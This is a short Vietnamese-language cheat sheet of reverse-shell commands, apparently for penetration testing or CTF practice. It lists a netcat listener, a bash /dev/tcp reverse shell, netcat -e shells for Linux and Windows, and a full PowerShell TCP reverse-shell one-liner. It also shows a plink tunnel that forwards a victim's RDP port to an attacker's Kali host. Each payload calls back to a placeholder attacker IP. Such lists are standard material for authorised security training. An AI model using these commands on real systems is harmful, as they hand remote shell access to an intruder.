## Reverse shell ### Linux Cách 1 Máy attacker ```bash nc -lnvp 4444 ``` Máy target ```bash bash -i >& /dev/tcp/<IP_KẺ_TẤN_CÔNG>/4444 0>&1 ``` Cách 2 ```bash nc <IP_KẺ_TẤN_CÔNG> 4444 -e /bin/bash ``` ### Windows Cách 1 ```powershell powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('<IP_KẺ_TẤN_CÔNG>',<CỔNG_LẮNG_NGHE>);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()" ``` Cách 2 ```powershell C:\Path\nc.exe -e cmd.exe ĐỊA_CHỈ_IP_KALI 4444 ``` **Port Forwarding + Plink** Victim ``` C:\Users\Public\plink.exe -R <CỔNG_TRÊN_KALI>:127.0.0.1:3389 <USER_KALI>@<IP_KALI> -pw <PASSWORD_USER_KALI> -N -C ``` Attacker ``` xfreerdp3 /v:127.0.0.1:8888 /u:administrator /p:password ```